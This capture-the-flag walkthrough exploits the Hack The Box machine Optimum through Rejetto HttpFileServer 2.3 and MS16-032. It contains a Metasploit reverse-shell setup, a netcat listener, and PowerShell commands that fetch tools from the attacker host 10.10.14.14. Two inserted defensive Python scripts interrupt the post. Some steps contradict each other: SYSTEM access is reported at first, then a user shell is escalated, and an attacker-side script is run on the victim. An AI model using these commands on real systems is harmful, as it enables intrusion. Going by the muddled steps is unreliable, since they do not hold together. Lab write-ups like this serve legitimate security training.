Keep Calm and Hack The Box – Optimum

Greetings fellow hackers! Today we'll be taking on the Optimum machine from Hack The Box. For those unfamiliar, Hack The Box is an online platform that lets you test and advance your penetration testing skills on virtual machines in a safe, legal environment. They've got dozens of realistic boxes with real-world configurations for you to practice on.

Optimum is a beginner-friendly Windows box that focuses on finding and exploiting known vulnerabilities in installed services. The path to both the user and root flag is fairly straightforward, but still provides a good lesson in proper enumeration and taking advantage of public exploits. We'll be using some common tools like Nmap and Metasploit to complete this challenge.

I'll be working from Kali Linux for this, but feel free to follow along in your distro of choice. Let's boot up our attack machine and get started!

Step 1 – Scanning the Network

No hacking attempt should begin without proper enumeration of the target. We need to know what this machine is running if we want to attack it. My go-to tool for network scanning is Nmap.

If you're not familiar with Nmap, it's a powerful scanner used to discover hosts and services on a network by sending packets and analyzing the responses. It's an essential tool for any pentester or hacker. I prefer to run it from the command line, but you can also use the graphical version, Zenmap, if you'd like.

Let's do an initial scan with a few common flags:

nmap -sV -O -F --version-light 10.10.10.8

  • -sV: Probe open ports to determine service/version info
  • -O: Enable OS detection
  • -F: Fast mode – Scan fewer ports than the default scan
  • --version-light: Limit to most likely probes (intensity 2)

This will give us a quick look at what's running on the box without being too intrusive. Our results show port 80 open running HttpFileServer httpd 2.3. This is definitely interesting and warrants further investigation.

For a more in-depth look we can do a full scan with:

nmap -sV -O -p- --script vulners 10.10.10.8

  • -p-: Scan all 65535 ports
  • --script: Scan with a specific nmap script, in this case vulners to look for vulnerabilities

However, for the sake of time, we'll move on since we already have a good target to look into – that HTTP server.

Step 2 – Enumerating the Web Server

Browsing to http://10.10.10.8 in our web browser, we're greeted with the landing page for HttpFileServer 2.3. At the bottom it conveniently tells us the exact version number, which will make searching for exploits easier.

So what exactly is HttpFileServer? It's a free, easy-to-use web server specifically designed for sharing files over HTTP. Developed by a company called Rejetto, it allows you to host files on your computer and access them from anywhere through a web browser. While convenient, it's not the most secure software, which is good news for us as hackers.

To look for any publicly known exploits for HttpFileServer 2.3, we'll use the handy searchsploit tool. Searchsploit scrapes exploit-db.com, which is a database of thousands of public exploits and corresponding vulnerable software. Let's see what it has for HttpFileServer:

searchsploit httpfileserver

This returns quite a few results, but one in particular catches my eye:

Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)

The description says it allows arbitrary code execution by using a Metasploit module. Sounds promising! To examine the exploit in detail we can use:

searchsploit -x 34926

This shows us the actual exploit code and a nice description of how it works. The vulnerability is due to a flaw in the parsing of HTTP GET requests which allows us to inject system commands via a null byte terminator. Great, this is exactly what we need to get a shell on the box. Time to fire up Metasploit!
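From the defender's side, the same detail (a null byte followed by an HFS macro in a GET request) is what an access-log rule should key on. The following is an added example, not code from the original post or from Rejetto: it URL-decodes each request target from a few constructed, hypothetical combined-log-style lines and ranks them by whether they contain a null byte, an `{.exec|` macro, or both. The log format, IPs and the macro name checked are assumptions for the illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (hypothetical; combined-log style).
# Line 3 carries both a null byte and a macro, line 4 only a null byte,
# line 5 only a macro, lines 1-2 are ordinary traffic.
SAMPLE_LOG = """\
10.10.14.14 - - [01/Jan/2024:12:00:00 +0000] "GET / HTTP/1.1" 200 1234
10.10.14.14 - - [01/Jan/2024:12:00:01 +0000] "GET /?search=report HTTP/1.1" 200 512
10.10.14.14 - - [01/Jan/2024:12:00:02 +0000] "GET /?search=%00{.exec|notepad.} HTTP/1.1" 200 512
10.10.14.14 - - [01/Jan/2024:12:00:03 +0000] "GET /?search=%00 HTTP/1.1" 200 512
10.10.14.14 - - [01/Jan/2024:12:00:04 +0000] "GET /?search={.exec|notepad.} HTTP/1.1" 200 512
"""

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# HFS macros open with "{." ; we look specifically for the exec macro.
MACRO_RE = re.compile(r"\{\.\s*exec\b", re.IGNORECASE)


def classify(line):
    """Return 'high', 'medium', 'low' or None for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Decode percent-encoding so %00 becomes an actual NUL character.
    decoded = unquote(m.group("target"))
    has_null = "\x00" in decoded
    has_macro = MACRO_RE.search(decoded) is not None
    if has_null and has_macro:
        return "high"      # null-byte terminator plus exec macro: the HFS 2.3 pattern
    if has_macro:
        return "medium"    # macro syntax in user input is suspicious on its own
    if has_null:
        return "low"       # a lone NUL is malformed input worth logging
    return None


def scan(log_text):
    """Return [(line_number, severity)] for every flagged line."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        sev = classify(line)
        if sev:
            findings.append((n, sev))
    return findings


if __name__ == "__main__":
    for n, sev in scan(SAMPLE_LOG):
        print(f"line {n}: {sev}")
```

Decoding before matching matters: a rule that only greps the raw line for `{.exec` misses a request where the braces are percent-encoded as well, while a rule that only looks for `%00` fires on every malformed request.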

Step 3 – Initial Compromise with Metasploit

Metasploit is an incredibly powerful platform that makes executing exploits like this a breeze. It even has a handy search function to look for modules:

msf > search rejetto

Sure enough, our exploit shows up as exploit/windows/http/rejetto_hfs_exec. Let's select it and take a look at the options:

msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) > show options

We'll need to set the RHOST to our target IP, 10.10.10.8, and RPORT to 80. Since it's a remote code execution, we'll also need to provide it a payload to execute. Let's go with the trusty windows/meterpreter/reverse_tcp. We'll also need to set LHOST to our own IP, where we want the reverse shell connecting back to.

msf exploit(rejetto_hfs_exec) > set RHOST 10.10.10.8
msf exploit(rejetto_hfs_exec) > set RPORT 80
msf exploit(rejetto_hfs_exec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(rejetto_hfs_exec) > set LHOST 10.10.14.14

Perfect, let's run this and see what happens:

msf exploit(rejetto_hfs_exec) > exploit

Success! After a brief moment we're greeted with a flashing red Meterpreter prompt. We've got a foothold!

For those wondering, Meterpreter is an advanced, dynamic payload that executes in memory and provides useful built-in commands for the hacker. Typing help will give you a list of all the possibilities such as file transfers, keylogging, and screenshots.

First things first, let's see what user we're running as:

meterpreter > getuid

Looks like we're authority\system, which is the highest privilege account in Windows. That's a good sign, but let's dig a little deeper with sysinfo to see what version of Windows and any installed patches.

The output tells us this is Windows 2012 R2 64-bit and lists off the installed patches denoted by their KB number. Looks like the OS hasn't been updated in a while, which means it's likely vulnerable to some public exploits.

Let's grab that user flag:

meterpreter > search -f user.txt
meterpreter > cat C:\Users\kostas\Desktop\user.txt

User flag is ours! On to the privilege escalation.

Step 4 – Privilege Escalation – Attempt 1

First, let's see if Metasploit has any local exploit suggester modules:

meterpreter > background
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options
msf post(local_exploit_suggester) > set session 1
msf post(local_exploit_suggester) > set showdescription true
msf post(local_exploit_suggester) > run

The module runs and provides a list of possible exploits that match the OS and architecture. It's a good place to start; however, none of these seem to work for our current session. Must be because we used the 32-bit meterpreter payload but the OS is 64-bit. We'll need to find a different approach.

After some searching online, I came across a promising lead – MS16-032. This is a Windows privilege escalation exploit that takes advantage of a flaw in the Secondary Logon Service. Best of all, it affects Windows 8.1 and Server 2012 R2 which is what Optimum is running.

There‘s a Metasploit module for it too:

exploit/windows/local/ms16_032_secondary_logon_handle_privesc

I set the session to my meterpreter session and the target to Windows x64, but no luck getting a shell. Hmm, seems like we‘ll have to take the manual approach and trigger the exploit ourselves outside of Metasploit.

Step 5 – Low-Privilege Shell

Before we dive into the privilege escalation exploit, let's get a more stable shell as the kostas user. There's another exploit for Rejetto HFS that essentially does the same thing as the Metasploit module, but runs a simple netcat reverse shell:

searchsploit -x 39161

The exploit is written in Python and seems simple enough. It crafts a special HTTP GET request that writes a netcat command to a temporary batch file and executes it. All we need to do is change the IP address in the script to our attack machine and start a netcat listener.

On our attack machine:

python -m SimpleHTTPServer 80
nc -nlvp 443

The Python command starts a basic HTTP server in the current directory so the victim can download netcat from us (make sure you have a nc.exe in your directory). The nc command starts a netcat listener on port 443.

On the victim, download and run the modified exploit:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.14/39161.py', '39161.py')"
python 39161.py 10.10.10.8 80

After running the exploit, our netcat listener catches the connection and we've got a shell as kostas! Much better. We already grabbed the user flag, so let's get root.

Step 6 – Enumeration for Privesc

To exploit MS16-032 we'll need to compile it from source on our Linux attack machine. But let's first confirm the OS is vulnerable.

For that I like to use Windows-Exploit-Suggester. It works by comparing the output of the systeminfo command to a database of Windows exploits. Very handy for quickly identifying vulnerabilities.

systeminfo > systeminfo.txt
python windows-exploit-suggester.py --database 2017-02-09-mssb.xls --systeminfo systeminfo.txt

The results show the OS is missing quite a few critical patches, MS16-032 being one of them. Time to compile the exploit and transfer it over.
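The same systeminfo-versus-patch-list comparison is exactly the check a patch-compliance job should run before an attacker does. Below is an added example, not code from the original post or from the Windows-Exploit-Suggester project: it parses the Hotfix(s) section of a constructed, hypothetical systeminfo capture and reports which bulletins from a small required-patch map are missing. The bulletin-to-KB map is an assumption for the illustration (MS16-032 is listed as KB3139914 here; confirm the mapping against the vendor bulletin for your OS build), and the hostname, NIC and hotfix numbers in the sample are constructed.

```python
import re

# Constructed sample of `systeminfo` output (hypothetical, trimmed to the
# fields the parser needs). Continuation lines are indented with spaces.
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3000850
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
"""

# Assumed bulletin -> KB mapping used for the illustration. Extend this from
# the vendor bulletin data for the OS build you are checking.
REQUIRED_KBS = {
    "MS16-032": "KB3139914",
}

FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def field(text, key):
    """Return the value of a top-level systeminfo field such as 'OS Name'."""
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m and m.group("key").strip() == key:
            return m.group("value").strip()
    return None


def parse_hotfixes(text):
    """Collect the KB identifiers listed under the Hotfix(s) section."""
    kbs = set()
    in_section = False
    for line in text.splitlines():
        if line.startswith("Hotfix(s):"):
            in_section = True
            continue
        if in_section:
            # Indented lines belong to the section; the next top-level
            # field (no leading whitespace) ends it.
            if line.startswith(" "):
                m = HOTFIX_RE.search(line)
                if m:
                    kbs.add(m.group(1))
            else:
                in_section = False
    return kbs


def missing_bulletins(installed, required):
    """Return the bulletins whose KB is not in the installed set, sorted."""
    return sorted(b for b, kb in required.items() if kb not in installed)


if __name__ == "__main__":
    installed = parse_hotfixes(SAMPLE_SYSTEMINFO)
    print("OS:", field(SAMPLE_SYSTEMINFO, "OS Name"))
    print("installed:", sorted(installed))
    print("missing:", missing_bulletins(installed, REQUIRED_KBS))
```

Feeding it the real systeminfo.txt from the box instead of the embedded sample is a matter of reading the file into `parse_hotfixes`; the same output is what an inventory agent would push to a patch dashboard.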

Step 7 – Privilege Escalation – MS16-032

MS16-032 exploits a flaw in the way the Secondary Logon Service handles impersonation tokens. The source code is available on ExploitDB. We'll compile it with mingw:

i686-w64-mingw32-gcc MS16-032.c -o MS16-032.exe

With our compiled exploit ready, let's set up another Python HTTP server and transfer MS16-032.exe to the victim machine.

On our attack machine:

python -m SimpleHTTPServer 80

On the victim:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.14/MS16-032.exe', 'MS16-032.exe')"

Time for the moment of truth, let's run it:

MS16-032.exe "C:\Windows\System32\cmd.exe"

Boom! We've got a shell as NT AUTHORITY\SYSTEM! The exploit worked perfectly. I'll spare you the details of how it works under the hood, but it basically involves abusing the lack of permission checks in the Secondary Logon Service to spawn a cmd.exe process with SYSTEM privileges.

Let's claim our prize:

C:\Users\Administrator\Desktop>type root.txt

Got the root flag! Another box pwned thanks to unpatched vulnerabilities and public exploits.

Conclusion

There you have it folks, Optimum from Hack The Box. The key takeaways here are the importance of keeping software updated with the latest security patches and being vigilant of what services you expose to the network. A neglected HTTP server was all it took to compromise this machine.

Doing these boxes is a great way to develop your hacking skills in a safe environment. I encourage you to create an account on HackTheBox and try Optimum and other boxes yourself. It's an excellent learning resource.

Feel free to reach out if you have any questions! You can usually find me messing around on HackTheBox, participating in CTFs, or ranting about cyber security on Twitter. Hack the planet!
